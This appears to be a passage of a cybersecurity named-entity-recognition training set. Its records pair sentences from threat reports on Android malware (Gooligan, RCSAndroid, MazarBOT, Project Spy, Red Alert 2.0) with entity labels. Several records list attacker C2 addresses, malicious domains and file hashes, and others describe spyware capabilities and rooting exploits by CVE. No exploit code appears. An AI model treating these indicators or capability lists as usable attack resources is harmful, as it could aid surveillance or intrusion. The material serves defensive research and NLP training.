Web pages ( “ third-party ” app ) and not through legitimate app stores .", "spans": {}, "info": {"id": "cyner_train_000257", "source": "cyner_train"}} {"text": "Red Alert 2.0 IoCs list C2 addresses 103.239.30.126:7878 146.185.241.29:7878 146.185.241.42:7878 185.126.200.3:7878 185.126.200.12:7878 185.126.200.15:7878 185.126.200.18:7878 
185.165.28.15:7878 185.243.243.241:7878 185.243.243.244:7878 185.243.243.245:7878 Domains Malware source Web hosts", "spans": {"MALWARE: Red Alert 2.0": [[0, 13]]}, "info": {"id": "cyner_train_000258", "source": "cyner_train"}} {"text": "on 167.99.176.61 : free-androidvpn.date free-androidvpn.download free-androidvpn.online free-vpn.date free-vpn.download free-vpn.online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372", "spans": {}, "info": {"id": "cyner_train_000259", "source": "cyner_train"}} {"text": "be92a751e5abbcd24151b509dbb4feb98ea46f367a99d6f86ed4a7c162461e31 5c4d666cef84abc2a1ffd3b1060ef28fa3c6c3bb4fad1fa26db99350b41bea4c 06081ab7faa729e33b9397a0e47548e75cbec3d43c50e6368e81d737552150a5 753999cb19a4346042f973e30cf1158c44f2335ab65859d3bfa16bca4098e2ef", "spans": {}, "info": {"id": "cyner_train_000260", "source": "cyner_train"}} {"text": "As a result of a lot of hard work done by our security research teams , we revealed today a new and alarming malware campaign .", "spans": {}, "info": {"id": "cyner_train_000261", "source": "cyner_train"}} {"text": "The number continues to rise at an additional 13,000 breached devices each day .", "spans": {}, "info": {"id": "cyner_train_000263", "source": "cyner_train"}} {"text": "Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play , Gmail , Google Photos , Google Docs , G Suite , Google Drive , and more .", "spans": {"SYSTEM: Google Play": [[130, 141]], "SYSTEM: Gmail": [[144, 149]], "SYSTEM: Google Photos": [[152, 165]], "SYSTEM: Google Docs": [[168, 179]], "SYSTEM: G Suite": [[182, 189]], "SYSTEM: Google Drive": [[192, 204]]}, "info": {"id": "cyner_train_000264", "source": "cyner_train"}} {"text": "Gooligan is a new variant of the Android malware campaign found by our researchers in the SnapPea app last year .", "spans": {"MALWARE: Gooligan": 
[[0, 8]], "MALWARE: SnapPea": [[90, 97]]}, "info": {"id": "cyner_train_000265", "source": "cyner_train"}} {"text": "Check Point reached out to the Google Security team immediately with information on this campaign .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google Security": [[31, 46]]}, "info": {"id": "cyner_train_000266", "source": "cyner_train"}} {"text": "Our researchers are working closely with Google to investigate the source of the Gooligan campaign .", "spans": {"ORGANIZATION: Google": [[41, 47]], "MALWARE: Gooligan campaign": [[81, 98]]}, "info": {"id": "cyner_train_000267", "source": "cyner_train"}} {"text": "“ We ’ re appreciative of both Check Point ’ s research and their partnership as we ’ ve worked together to understand these issues , ” said Adrian Ludwig , Google ’ s director of Android security .", "spans": {"ORGANIZATION: Check Point": [[31, 42]], "ORGANIZATION: Google": [[157, 163]], "SYSTEM: Android": [[180, 187]]}, "info": {"id": "cyner_train_000268", "source": "cyner_train"}} {"text": "We have chosen to join forces to continue the investigation around Gooligan .", "spans": {"MALWARE: Gooligan": [[67, 75]]}, "info": {"id": "cyner_train_000270", "source": "cyner_train"}} {"text": "Google also stated that they are taking numerous steps including proactively notifying affected accounts , revoking affected tokens and deploying SafetyNet improvements to protect users from these apps in the future .", "spans": {"ORGANIZATION: Google": [[0, 6]]}, "info": {"id": "cyner_train_000271", "source": "cyner_train"}} {"text": "Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop )": [[40, 92]]}, "info": {"id": "cyner_train_000273", "source": "cyner_train"}} {"text": "In our research we identified tens of fake applications that were infected with 
this malware .", "spans": {}, "info": {"id": "cyner_train_000275", "source": "cyner_train"}} {"text": "You may review your application list in “ Settings - > Apps ” , if you find one of this applications , please consider downloading an antivirus product such as Check Point ZoneAlarm to check if you are indeed infected .", "spans": {"ORGANIZATION: Check Point": [[160, 171]], "SYSTEM: ZoneAlarm": [[172, 181]]}, "info": {"id": "cyner_train_000277", "source": "cyner_train"}} {"text": "How do you know if your Google account is breached ?", "spans": {"ORGANIZATION: Google": [[24, 30]]}, "info": {"id": "cyner_train_000279", "source": "cyner_train"}} {"text": "You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ .", "spans": {}, "info": {"id": "cyner_train_000280", "source": "cyner_train"}} {"text": "If your account has been breached , the following steps are required : A clean installation of an operating system on your mobile device is required ( a process called “ flashing ” ) .", "spans": {}, "info": {"id": "cyner_train_000281", "source": "cyner_train"}} {"text": "As this is a complex process , we recommend powering off your device and approaching a certified technician , or your mobile service provider , to request that your device be “ re-flashed. 
” Change your Google account passwords immediately after this process .", "spans": {"ORGANIZATION: Google": [[203, 209]]}, "info": {"id": "cyner_train_000282", "source": "cyner_train"}} {"text": "How do Android devices become infected ?", "spans": {}, "info": {"id": "cyner_train_000283", "source": "cyner_train"}} {"text": "We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores .", "spans": {"MALWARE: Gooligan": [[23, 31]], "SYSTEM: Android": [[97, 104]]}, "info": {"id": "cyner_train_000284", "source": "cyner_train"}} {"text": "These stores are an attractive alternative to Google Play because many of their apps are free , or offer free versions of paid apps .", "spans": {"SYSTEM: Google Play": [[46, 57]]}, "info": {"id": "cyner_train_000285", "source": "cyner_train"}} {"text": "However , the security of these stores and the apps they sell aren ’ t always verified .", "spans": {}, "info": {"id": "cyner_train_000286", "source": "cyner_train"}} {"text": "How did Gooligan emerge ?", "spans": {"MALWARE: Gooligan": [[8, 16]]}, "info": {"id": "cyner_train_000288", "source": "cyner_train"}} {"text": "Our researchers first encountered Gooligan ’ s code in the malicious SnapPea app last year .", "spans": {"MALWARE: Gooligan": [[34, 42]], "MALWARE: SnapPea": [[69, 76]]}, "info": {"id": "cyner_train_000289", "source": "cyner_train"}} {"text": "At the time this malware was reported by several security vendors , and attributed to different malware families like Ghostpush , MonkeyTest , and Xinyinhe .", "spans": {"MALWARE: Ghostpush": [[118, 127]], "MALWARE: MonkeyTest": [[130, 140]], "MALWARE: Xinyinhe": [[147, 155]]}, "info": {"id": "cyner_train_000290", "source": "cyner_train"}} {"text": "By late 2015 , the malware ’ s creators had gone mostly silent until the summer of 2016 when the malware reappeared with a more complex architecture that injects malicious code into Android system processes .", "spans": {"SYSTEM: 
Android": [[182, 189]]}, "info": {"id": "cyner_train_000291", "source": "cyner_train"}} {"text": "The change in the way the malware works today may be to help finance the campaign through fraudulent ad activity .", "spans": {}, "info": {"id": "cyner_train_000292", "source": "cyner_train"}} {"text": "The malware simulates clicks on app advertisements provided by legitimate ad networks and forces the app to install on a device .", "spans": {}, "info": {"id": "cyner_train_000293", "source": "cyner_train"}} {"text": "An attacker is paid by the network when one of these apps is installed successfully .", "spans": {}, "info": {"id": "cyner_train_000294", "source": "cyner_train"}} {"text": "Logs collected by Check Point researchers show that every day Gooligan installs at least 30,000 apps fraudulently on breached devices or over 2 million apps since the campaign began .", "spans": {"ORGANIZATION: Check Point": [[18, 29]], "MALWARE: Gooligan": [[62, 70]]}, "info": {"id": "cyner_train_000295", "source": "cyner_train"}} {"text": "How does Gooligan work ?", "spans": {"MALWARE: Gooligan": [[9, 17]]}, "info": {"id": "cyner_train_000296", "source": "cyner_train"}} {"text": "The infection begins when a user downloads and installs a Gooligan-infected app on a vulnerable Android device .", "spans": {"MALWARE: Gooligan-infected": [[58, 75]]}, "info": {"id": "cyner_train_000297", "source": "cyner_train"}} {"text": "Our research team has found infected apps on third-party app stores , but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages .", "spans": {"SYSTEM: Android": [[107, 114]]}, "info": {"id": "cyner_train_000298", "source": "cyner_train"}} {"text": "After an infected app is installed , it sends data about the device to the campaign ’ s Command and Control ( C & C ) server .", "spans": {}, "info": {"id": "cyner_train_000299", "source": "cyner_train"}} {"text": "Gooligan then downloads a rootkit from the C & C server 
that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT ( CVE-2013-6282 ) and Towelroot ( CVE-2014-3153 ) .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 and 5": [[89, 104]], "VULNERABILITY: VROOT": [[139, 144]], "VULNERABILITY: CVE-2013-6282": [[147, 160]], "VULNERABILITY: Towelroot": [[167, 176]], "VULNERABILITY: CVE-2014-3153": [[179, 192]]}, "info": {"id": "cyner_train_000300", "source": "cyner_train"}} {"text": "If rooting is successful , the attacker has full control of the device and can execute privileged commands remotely .", "spans": {}, "info": {"id": "cyner_train_000302", "source": "cyner_train"}} {"text": "This module injects code into running Google Play or GMS ( Google Mobile Services ) to mimic user behavior so Gooligan can avoid detection , a technique first seen with the mobile malware HummingBad .", "spans": {"SYSTEM: Google Play": [[38, 49]], "SYSTEM: GMS ( Google Mobile Services )": [[53, 83]], "MALWARE: Gooligan": [[110, 118]], "MALWARE: HummingBad": [[188, 198]]}, "info": {"id": "cyner_train_000304", "source": "cyner_train"}} {"text": "This is another reminder of why users shouldn ’ t rely on ratings alone to decide whether to trust an app .", "spans": {}, "info": {"id": "cyner_train_000309", "source": "cyner_train"}} {"text": "What are Google authorization tokens ?", "spans": {"ORGANIZATION: Google": [[9, 15]]}, "info": {"id": "cyner_train_000311", "source": "cyner_train"}} {"text": "A Google authorization token is a way to access the Google account and the related services of a user .", "spans": {"ORGANIZATION: Google": [[2, 8], [52, 58]]}, "info": {"id": "cyner_train_000312", "source": "cyner_train"}} {"text": "It is issued by Google once a user successfully logged into this account .", "spans": {"ORGANIZATION: Google": [[16, 22]]}, "info": {"id": "cyner_train_000313", "source": "cyner_train"}} {"text": "When an authorization token is stolen by a hacker , they can use this token to access 
all the Google services related to the user , including Google Play , Gmail , Google Docs , Google Drive , and Google Photos .", "spans": {"ORGANIZATION: Google": [[94, 100]], "SYSTEM: Google Play": [[142, 153]], "SYSTEM: Gmail": [[156, 161]], "SYSTEM: Google Docs": [[164, 175]], "SYSTEM: Google Drive": [[178, 190]], "SYSTEM: Google Photos": [[197, 210]]}, "info": {"id": "cyner_train_000314", "source": "cyner_train"}} {"text": "Conclusion Gooligan has breached over a million Google accounts .", "spans": {"MALWARE: Gooligan": [[11, 19]], "ORGANIZATION: Google": [[48, 54]]}, "info": {"id": "cyner_train_000316", "source": "cyner_train"}} {"text": "We believe that it is the largest Google account breach to date , and we are working with Google to continue the investigation .", "spans": {"MALWARE: Google": [[34, 40]], "ORGANIZATION: Google": [[90, 96]]}, "info": {"id": "cyner_train_000317", "source": "cyner_train"}} {"text": "We encourage Android users to validate whether their accounts have been breached .", "spans": {"SYSTEM: Android": [[13, 20]]}, "info": {"id": "cyner_train_000318", "source": "cyner_train"}} {"text": "( Researchers have been aware of this suite as early as 2014 .", "spans": {}, "info": {"id": "cyner_train_000321", "source": "cyner_train"}} {"text": ") The RCSAndroid code can be considered one of the most professionally developed and sophisticated Android malware ever exposed .", "spans": {"MALWARE: RCSAndroid": [[6, 16]], "SYSTEM: Android": [[99, 106]]}, "info": {"id": "cyner_train_000322", "source": "cyner_train"}} {"text": "The leak of its code provides cybercriminals with a new weaponized resource for enhancing their surveillance operations .", "spans": {}, "info": {"id": "cyner_train_000323", "source": "cyner_train"}} {"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the “ screencap ” command and framebuffer direct reading Monitor clipboard content 
Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode", "spans": {"MALWARE: RCSAndroid": [[31, 41]], "SYSTEM: Skype": [[288, 293]], "SYSTEM: Facebook": [[296, 304]], "SYSTEM: Twitter": [[307, 314]], "SYSTEM: Google": [[317, 323]], "SYSTEM: WhatsApp": [[326, 334]], "SYSTEM: Mail": [[337, 341]], "SYSTEM: LinkedIn": [[348, 356]], "SYSTEM: Gmail": [[409, 414]]}, "info": {"id": "cyner_train_000324", "source": "cyner_train"}} {"text": "messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger .", "spans": {"SYSTEM: Facebook Messenger": [[38, 56]], "SYSTEM: WhatsApp": [[59, 67]], "SYSTEM: Skype": [[70, 75]], "SYSTEM: Viber": [[78, 83]], "SYSTEM: Line": [[86, 90]], "SYSTEM: WeChat": [[93, 99]], "SYSTEM: Hangouts": [[102, 110]], "SYSTEM: Telegram": [[113, 121]], "SYSTEM: BlackBerry Messenger": [[128, 148]]}, "info": {"id": "cyner_train_000325", "source": "cyner_train"}} {"text": "Capture real-time voice calls in any network or app by hooking into the “ mediaserver ” system service RCSAndroid in the Wild Our analysis reveals that this RCSAndroid ( AndroidOS_RCSAgent.HRX ) has been in the wild since 2012 .", "spans": {"MALWARE: RCSAndroid": [[103, 113], [157, 167]]}, "info": {"id": "cyner_train_000326", "source": "cyner_train"}} {"text": "Traces of its previous uses in the wild were found inside the configuration file : It was configured to use a Command-and-control ( C & C ) server in the United States ; however , the server was bought from a host service provider and is now unavailable .", "spans": {}, "info": {"id": "cyner_train_000327", "source": "cyner_train"}} {"text": "Attackers can send SMS with certain 
messages to activate the agent and trigger corresponding action .", "spans": {}, "info": {"id": "cyner_train_000329", "source": "cyner_train"}} {"text": "This can also define what kind of evidences to collect .", "spans": {}, "info": {"id": "cyner_train_000330", "source": "cyner_train"}} {"text": "Based on emails leaked in the dump , a number of Czech firms appear to be in business with the Hacking team , including a major IT partner in the Olympic Games .", "spans": {}, "info": {"id": "cyner_train_000331", "source": "cyner_train"}} {"text": "The first method is to send a specially crafted URL to the target via SMS or email .", "spans": {}, "info": {"id": "cyner_train_000334", "source": "cyner_train"}} {"text": "The role of ANDROIDOS_HTBENEWS.A and the malicious APK mentioned in the first method is to exploit a local privilege escalation vulnerability in Android devices .", "spans": {"MALWARE: ANDROIDOS_HTBENEWS.A": [[12, 32]], "VULNERABILITY: local privilege escalation vulnerability": [[101, 141]]}, "info": {"id": "cyner_train_000337", "source": "cyner_train"}} {"text": "The said exploits will root the device and install a shell backdoor .", "spans": {}, "info": {"id": "cyner_train_000339", "source": "cyner_train"}} {"text": "This agent has two core modules , the Evidence Collector and the Event Action Trigger .", "spans": {}, "info": {"id": "cyner_train_000341", "source": "cyner_train"}} {"text": "The Evidence Collector module is responsible for the spying routines outlined above .", "spans": {}, "info": {"id": "cyner_train_000342", "source": "cyner_train"}} {"text": "One of its most notable routines is capturing voice calls in real time by hooking into the “ mediaserver ” system service .", "spans": {}, "info": {"id": "cyner_train_000343", "source": "cyner_train"}} {"text": "The basic idea is to hook the voice call process in mediaserver .", "spans": {}, "info": {"id": "cyner_train_000344", "source": "cyner_train"}} {"text": "Take voice call playback process for 
example .", "spans": {}, "info": {"id": "cyner_train_000345", "source": "cyner_train"}} {"text": "The mediaserver will first builds a new unique track , start to play the track , loop play all audio buffer , then finally stop the playback .", "spans": {}, "info": {"id": "cyner_train_000346", "source": "cyner_train"}} {"text": "With the help of the open-source Android Dynamic Binary Instrumentation Toolkit and root privilege , it is possible to intercept any function execution .", "spans": {"SYSTEM: Android": [[33, 40]]}, "info": {"id": "cyner_train_000348", "source": "cyner_train"}} {"text": "Interestingly , one unused feature of the app is its ability to manipulate data in the Android package manager to add and remove permissions and components as well as hide the app icon .", "spans": {"SYSTEM: Android": [[87, 94]]}, "info": {"id": "cyner_train_000353", "source": "cyner_train"}} {"text": "Recommendations Popular mobile platforms like Android are common targets for organized or commercialized monitoring operations .", "spans": {"SYSTEM: Android": [[46, 53]]}, "info": {"id": "cyner_train_000354", "source": "cyner_train"}} {"text": "Attackers know that rooting devices via malware exploits is an effective means to control devices and gather information from them .", "spans": {}, "info": {"id": "cyner_train_000355", "source": "cyner_train"}} {"text": "In a root broken device , security is a fairy tale .", "spans": {}, "info": {"id": "cyner_train_000356", "source": "cyner_train"}} {"text": "Take note of the following best practices to prevent this threat from getting in your device : Disable app installations from unknown , third-party sources .", "spans": {}, "info": {"id": "cyner_train_000357", "source": "cyner_train"}} {"text": "Constantly update your Android devices to the latest version to help prevent exploits , especially in the case of RCSAndroid which can affect only up to version 4.4.4 KitKat .", "spans": {"SYSTEM: Android": [[23, 30]], "MALWARE: RCSAndroid": 
[[114, 124]], "SYSTEM: 4.4.4 KitKat": [[161, 173]]}, "info": {"id": "cyner_train_000358", "source": "cyner_train"}} {"text": "Note , however , that based on the leak mail from a customer inquiry , Hacking Team was in the process of developing exploits for Android 5.0 Lollipop .", "spans": {"ORGANIZATION: Hacking Team": [[71, 83]], "SYSTEM: Android 5.0 Lollipop": [[130, 150]]}, "info": {"id": "cyner_train_000359", "source": "cyner_train"}} {"text": "Install a mobile security solution to secure your device from threats .", "spans": {}, "info": {"id": "cyner_train_000360", "source": "cyner_train"}} {"text": "The leaked RCSAndroid code is a commercial weapon now in the wild .", "spans": {"MALWARE: RCSAndroid code": [[11, 26]]}, "info": {"id": "cyner_train_000361", "source": "cyner_train"}} {"text": "Mobile users are called on to be on top of this news and be on guard for signs of monitoring .", "spans": {}, "info": {"id": "cyner_train_000362", "source": "cyner_train"}} {"text": "Users may be required the help of their device manufacturer to get support for firmware flashing .", "spans": {}, "info": {"id": "cyner_train_000365", "source": "cyner_train"}} {"text": "Find out more about the 7 Android Security Hacks You Need to Do Right Now to keep your mobile data safe .", "spans": {"SYSTEM: Android": [[26, 33]]}, "info": {"id": "cyner_train_000367", "source": "cyner_train"}} {"text": "Update as of July 23 , 2015 1:00 AM PDT ( UTC-7 ) We have added a link to a previous report discussing this threat .", "spans": {}, "info": {"id": "cyner_train_000368", "source": "cyner_train"}} {"text": "Timeline of posts related to the Hacking Team DATE UPDATE July 5 The Italian company Hacking Team was hacked , with more than 400GB of confidential company data made available to the public .", "spans": {"ORGANIZATION: Hacking Team": [[85, 97]]}, "info": {"id": "cyner_train_000369", "source": "cyner_train"}} {"text": "One of these [ CVE-2015-5119 ] was a Flash zero-day .", "spans": 
{"VULNERABILITY: CVE-2015-5119": [[15, 28]]}, "info": {"id": "cyner_train_000371", "source": "cyner_train"}} {"text": "The Windows kernel vulnerability ( CVE-2015-2387 ) existed in the open type font manager module ( ATMFD.dll ) and can be exploited to bypass the sandbox mitigation mechanism .", "spans": {"VULNERABILITY: Windows kernel vulnerability": [[4, 32]], "VULNERABILITY: CVE-2015-2387": [[35, 48]]}, "info": {"id": "cyner_train_000372", "source": "cyner_train"}} {"text": "The Flash zero-day exploit ( CVE-2015-5119 ) was added into the Angler Exploit Kit and Nuclear Exploit Pack .", "spans": {"SYSTEM: Flash": [[4, 9]], "VULNERABILITY: CVE-2015-5119": [[29, 42]], "MALWARE: Angler Exploit Kit": [[64, 82]], "MALWARE: Nuclear Exploit Pack": [[87, 107]]}, "info": {"id": "cyner_train_000373", "source": "cyner_train"}} {"text": "It was also used in limited attacks in Korea and Japan .", "spans": {}, "info": {"id": "cyner_train_000374", "source": "cyner_train"}} {"text": "July 11 Two new Flash zero-day vulnerabilities , CVE-2015-5122 and CVE-2015-5123 , were found in the hacking team dump .", "spans": {"VULNERABILITY: Flash zero-day vulnerabilities": [[16, 46]], "VULNERABILITY: CVE-2015-5122": [[49, 62]], "VULNERABILITY: CVE-2015-5123": [[67, 80]]}, "info": {"id": "cyner_train_000375", "source": "cyner_train"}} {"text": "July 13 Further analysis of the hacking team dump revealed that the company used UEFI BIOS rootkit to keep their Remote Control System ( RCS ) agent installed in their targets ’ systems .", "spans": {"MALWARE: UEFI BIOS rootkit": [[81, 98]], "MALWARE: Remote Control System ( RCS )": [[113, 142]]}, "info": {"id": "cyner_train_000376", "source": "cyner_train"}} {"text": "July 20 A new zero-day vulnerability ( CVE-2015-2426 ) was found in Windows , which Microsoft fixed in an out-of-band patch .", "spans": {"VULNERABILITY: zero-day vulnerability": [[14, 36]], "VULNERABILITY: CVE-2015-2426": [[39, 52]], "SYSTEM: Windows": [[68, 75]], "ORGANIZATION: 
Microsoft": [[84, 93]]}, "info": {"id": "cyner_train_000379", "source": "cyner_train"}} {"text": "July 21 Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in .", "spans": {"MALWARE: RCSAndroid": [[24, 34]]}, "info": {"id": "cyner_train_000380", "source": "cyner_train"}} {"text": "July 28 A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team .", "spans": {"SYSTEM: Flash": [[76, 81]], "ORGANIZATION: Hacking Team": [[102, 114]]}, "info": {"id": "cyner_train_000381", "source": "cyner_train"}} {"text": "Android users warned of malware attack spreading via SMS FEB 16 , 2016 Security researchers are warning owners of Android smartphones about a new malware attack , spreading via SMS text messages .", "spans": {"SYSTEM: Android": [[0, 7], [114, 121]]}, "info": {"id": "cyner_train_000382", "source": "cyner_train"}} {"text": "As the team at Scandinavian security group CSIS describes , malware known as MazarBOT is being distributed via SMS in Denmark and is likely to also be encountered in other countries .", "spans": {"ORGANIZATION: CSIS": [[43, 47]], "MALWARE: MazarBOT": [[77, 85]]}, "info": {"id": "cyner_train_000383", "source": "cyner_train"}} {"text": "The txt message uses social engineering to dupe unsuspecting users into clicking on a link to a downloadable Android application .", "spans": {"SYSTEM: Android": [[109, 116]]}, "info": {"id": "cyner_train_000385", "source": "cyner_train"}} {"text": "CSIS provided a ( sanitised ) version of a typical message to warn users what to look out for : “ You have received a multimedia message from + [ country code ] [ sender number ] Follow the link http : //www.mmsforyou [ .", "spans": {"ORGANIZATION: CSIS": [[0, 4]]}, "info": {"id": "cyner_train_000386", "source": "cyner_train"}} {"text": "] net/mms.apk to view the message ” Once the APK package is downloaded , potential victims are urged to grant the malicious app a 
wide range of permissions on their Android device : App permissions SEND_SMS RECEIVE_BOOT_COMPLETED INTERNET SYSTEM_ALERT_WINDOW WRITE_SMS ACCESS_NETWORK_STATE WAKE_LOCK GET_TASKS CALL_PHONE RECEIVE_SMS READ_PHONE_STATE READ_SMS ERASE_PHONE Once installed , MazarBOT downloads a copy of", "spans": {"MALWARE: MazarBOT": [[388, 396]]}, "info": {"id": "cyner_train_000387", "source": "cyner_train"}} {"text": "Tor onto users ’ Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim ’ s location to an Iranian mobile phone number .", "spans": {"SYSTEM: Tor": [[0, 3]], "SYSTEM: Android": [[17, 24]]}, "info": {"id": "cyner_train_000388", "source": "cyner_train"}} {"text": "With the malware now in place , a number of actions can be performed , including allowing attackers to secretly monitor and control smartphones via a backdoor , send messages to premium-rate numbers , and intercept two-factor authentication codes sent by online banking apps and the like .", "spans": {}, "info": {"id": "cyner_train_000389", "source": "cyner_train"}} {"text": "In fact , with full access to the compromised Android smartphone , the opportunities for criminals to wreak havoc are significant – such as erasing infected phones or launching man-in-the-middle ( MITM ) attacks .", "spans": {"SYSTEM: Android smartphone": [[46, 64]]}, "info": {"id": "cyner_train_000390", "source": "cyner_train"}} {"text": "This , in itself , does not prove that the perpetrators of the malware campaign are based in Russia , but it certainly sounds as if that is a strong possibility .", "spans": {}, "info": {"id": "cyner_train_000392", "source": "cyner_train"}} {"text": "Malware authors in the past have often coded a “ safety net ” into their malware to prevent them from accidentally infecting their own computers and devices .", "spans": {}, "info": {"id": "cyner_train_000393", "source": "cyner_train"}} {"text": "And , of course , remember to always be wary of 
unsolicited , unusual text messages and installing apps from third-party sources on your Android smartphone .", "spans": {"SYSTEM: Android smartphone": [[137, 155]]}, "info": {"id": "cyner_train_000395", "source": "cyner_train"}} {"text": "Coronavirus Update App Leads to Project Spy Android and iOS Spyware We discovered a cyberespionage campaign we have named Project Spy infecting Android and iOS devices with spyware by using the coronavirus disease ( Covid-19 ) as a lure .", "spans": {"SYSTEM: Coronavirus Update App": [[0, 22]], "MALWARE: Project Spy": [[32, 43], [122, 133]], "SYSTEM: Android": [[44, 51], [144, 151]], "SYSTEM: iOS": [[56, 59], [156, 159]]}, "info": {"id": "cyner_train_000396", "source": "cyner_train"}} {"text": "Project Spy uses the ongoing coronavirus pandemic as a lure , posing as an app called Coronavirus Updates .", "spans": {"MALWARE: Project Spy": [[0, 11]]}, "info": {"id": "cyner_train_000398", "source": "cyner_train"}} {"text": "However , we have noted a significantly small number of downloads of the app in Pakistan , India , Afghanistan , Bangladesh , Iran , Saudi Arabia , Austria , Romania , Grenada , and Russia .", "spans": {}, "info": {"id": "cyner_train_000400", "source": "cyner_train"}} {"text": "Project Spy routine At the end of March 2020 , we came across an app masquerading as a coronavirus update app , which we named Project Spy based on the login page of its backend server .", "spans": {"MALWARE: Project Spy": [[0, 11], [127, 138]]}, "info": {"id": "cyner_train_000401", "source": "cyner_train"}} {"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. 
, IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g.", "spans": {"SYSTEM: GSM": [[55, 58]], "SYSTEM: WhatsApp": [[61, 69]], "SYSTEM: Telegram": [[72, 80]], "SYSTEM: Facebook": [[83, 91]], "SYSTEM: Threema": [[98, 105]], "SYSTEM: Android": [[330, 337]]}, "info": {"id": "cyner_train_000402", "source": "cyner_train"}} {"text": ", IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database .", "spans": {}, "info": {"id": "cyner_train_000403", "source": "cyner_train"}} {"text": "Project Spy ’ s earlier versions Searching for the domain in our sample database , we found that the coronavirus update app appears to be the latest version of another sample that we detected in May 2019 .", "spans": {"MALWARE: Project Spy": [[0, 11]]}, "info": {"id": "cyner_train_000405", "source": "cyner_train"}} {"text": "The first version of Project Spy ( detected by Trend Micro as AndroidOS_SpyAgent.HRXB ) had the following capabilities : Collect device and system information ( i.e. 
, IMEI , device ID , manufacturer , model and phone number ) , location information , contacts stored , and call logs Collect and send SMS Take pictures via the camera Upload recorded MP4 files Monitor calls Searching further , we also found another sample that could be the second version of Project Spy .", "spans": {"MALWARE: Project Spy": [[21, 32]], "ORGANIZATION: Trend Micro": [[47, 58]]}, "info": {"id": "cyner_train_000406", "source": "cyner_train"}} {"text": "In this second version , the developer ’ s name listed was “ concipit1248 ” in Google Play , and may have been active between May 2019 to February 2020 .", "spans": {"SYSTEM: Google Play": [[79, 90]]}, "info": {"id": "cyner_train_000408", "source": "cyner_train"}} {"text": "This app appears to have become unavailable on Google Play in March 2020 .", "spans": {"SYSTEM: Google Play": [[47, 58]]}, "info": {"id": "cyner_train_000409", "source": "cyner_train"}} {"text": "The second Project Spy version has similar capabilities to the first version , with the addition of the following : Stealing notification messages sent from WhatsApp , Facebook , and Telegram Abandoning the FTP mode of uploading the recorded images Aside from changing the app ’ s supposed function and look , the second and third versions ’ codes had little differences .", "spans": {"MALWARE: Project Spy": [[11, 22]], "SYSTEM: WhatsApp": [[157, 165]], "SYSTEM: Facebook": [[168, 176]], "SYSTEM: Telegram": [[183, 191]]}, "info": {"id": "cyner_train_000410", "source": "cyner_train"}} {"text": "Potentially malicious iOS connection Using the codes and “ Concipit1248 ” to check for more versions , we found two other apps in the App Store .", "spans": {"SYSTEM: iOS": [[22, 25]], "SYSTEM: App Store": [[134, 143]]}, "info": {"id": "cyner_train_000411", "source": "cyner_train"}} {"text": "] ee , is the same one used in the Android version of Project Spy .", "spans": {"SYSTEM: Android": [[35, 42]], "SYSTEM: Project Spy": [[54, 65]]}, "info": {"id": 
"cyner_train_000414", "source": "cyner_train"}} {"text": "However , although the “ Concipit1248 ” app requested permissions to open the device camera and read photos , the code only can upload a self-contained PNG file to a remote sever .", "spans": {}, "info": {"id": "cyner_train_000415", "source": "cyner_train"}} {"text": "This may imply the “ Concipit1248 ” app is still incubating .", "spans": {}, "info": {"id": "cyner_train_000416", "source": "cyner_train"}} {"text": "It also appears the apps may still be in development or incubation , maybe waiting for a “ right time ” to inject the malicious codes .", "spans": {}, "info": {"id": "cyner_train_000421", "source": "cyner_train"}} {"text": "It ’ s also possible that the apps are being used to test other possible techniques .", "spans": {}, "info": {"id": "cyner_train_000422", "source": "cyner_train"}} {"text": "A possible indication for timing might be when the app reaches a specific number of downloads or infected devices .", "spans": {}, "info": {"id": "cyner_train_000423", "source": "cyner_train"}} {"text": "The coding style suggests that the cybercriminals behind this campaign are amateurs .", "spans": {}, "info": {"id": "cyner_train_000424", "source": "cyner_train"}} {"text": "The incomplete iOS codes used in this campaign may have been bought while other capabilities appear to have been added .", "spans": {"SYSTEM: iOS": [[15, 18]]}, "info": {"id": "cyner_train_000425", "source": "cyner_train"}} {"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d", "spans": {}, "info": {"id": "cyner_train_000430", "source": "cyner_train"}} {"text": "AndroidOS_ProjectSpy.HRX 